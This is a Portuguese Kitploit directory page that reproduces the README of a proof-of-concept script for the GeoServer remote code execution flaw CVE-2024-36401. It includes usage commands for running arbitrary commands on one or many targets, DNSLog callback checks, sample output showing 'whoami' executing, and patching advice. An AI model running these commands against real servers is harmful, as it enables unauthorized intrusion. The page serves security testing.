Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-36401_Geoserver_RCE_POC — Este script é uma ferramenta de detecção PoC (Proof of Concept) desenvolvida para a vulnerabilidade de execução remota de código no GeoServer (CVE-2024-36401). Essa vulnerabilidade permite que um atacante execute comandos arbitrários no servidor de destino por meio da construção de requisições específicas. | Kitploit
Ferramentas/GitHubGitHub/amoy6228/cve-2024-36401_geoserver_rce_poc
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubamoy6228/cve-2024-36401_geoserver_rce_poc

CVE-2024-36401_Geoserver_RCE_POC

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
2há 1 anoAinda não revisado

Sobre

Este script é uma ferramenta de detecção PoC (Proof of Concept) desenvolvida para a vulnerabilidade de execução remota de código no GeoServer (CVE-2024-36401). Essa vulnerabilidade permite que um atacante execute comandos arbitrários no servidor de destino por meio da construção de requisições específicas.

Compartilhar

⚠️ Aviso legal: Esta ferramenta destina-se exclusivamente a pesquisa de segurança e testes com autorização legítima. Não a utilize para fins ilícitos. O usuário assume toda a responsabilidade legal.

Versão do README: [Inglês | Chinês]

Descrição da vulnerabilidade

Este script é uma ferramenta de detecção PoC (Proof of Concept) desenvolvida para a vulnerabilidade de execução remota de código (CVE-2024-36401) no GeoServer. Essa vulnerabilidade permite que um atacante execute comandos arbitrários no servidor de destino ao construir solicitações específicas.


Dependências do ambiente

Certifique-se de que as seguintes dependências estejam instaladas no seu ambiente de execução:

  • Python 3.x
  • Bibliotecas de terceiros:
    • requests
    • lxml

Você pode instalar as dependências necessárias com o seguinte comando:

root@kitploit:~
pip install requests lxml

Instruções de uso

Detecção de alvo único

root@kitploit:~
python poc.py -u http://target.com -d dnslog.example.com

Ou especifique o comando a ser executado:

root@kitploit:~
python poc.py -u http://target.com -c "touch /tmp/vulntest"

Detecção em lote de vários alvos

Prepare um arquivo de texto contendo várias URLs de destino (uma por linha):

root@kitploit:~
python poc.py -uf targets.txt -d dnslog.example.com

Ou especifique um comando:

root@kitploit:~
python poc.py -uf targets.txt -c "id"

Instruções detalhadas de uso: Documento de instruções detalhadas


Descrição dos parâmetros

⚠️ Atenção: os parâmetros -d e -c não podem ser usados simultaneamente.


Exemplo de saída

root@kitploit:~
[INFO] 爬取到3个有效的 Typenames,开始漏洞探测
[INFO] 目标: http://example.com
[INFO] 执行命令: whoami
[INFO] DNSLOG地址:

[INFO] 正在尝试 typeName: topp:states -> whoami
[+] 命令疑似成功执行!目标: http://example.com 命令: whoami

Características do script

  • Corrige o problema no POC do Nuclei em que os Typenames estavam definidos estaticamente, fazendo a validação da vulnerabilidade falhar.
  • Automatiza a coleta de todas as informações de Typenames e testa em loop os Typenames exploráveis.
  • Suporta o uso do parâmetro -c para executar comandos.
  • Suporta fornecer um arquivo de URLs para testar em lote se a vulnerabilidade está presente.

Recomendações de segurança

  • Atualize o GeoServer para a versão oficial mais recente o mais rápido possível.
  • Aplique controle de acesso às instâncias do GeoServer expostas à Internet.
  • Configure o firewall para restringir as origens de acesso ao endpoint /geoserver/wfs.

Contribuição

Contribuições são bem-vindas! Envie uma Issue ou um Pull Request para ajudar a melhorar este projeto.


Licença

Este projeto é licenciado sob a MIT License. Você pode modificar, distribuir e usar comercialmente livremente, mas deve manter o aviso de direitos autorais.


Baixar ferramenta
ParâmetroDescrição
-u, --urlEspecifica o endereço de um único alvo
-uf, --url-fileEspecifica o caminho de um arquivo que contém várias URLs de destino
-d, --dnslogEspecifica o endereço DNSLog
-c, --commandEspecifica o comando a ser executado no sistema de destino (ex.: whoami, id, curl, etc.)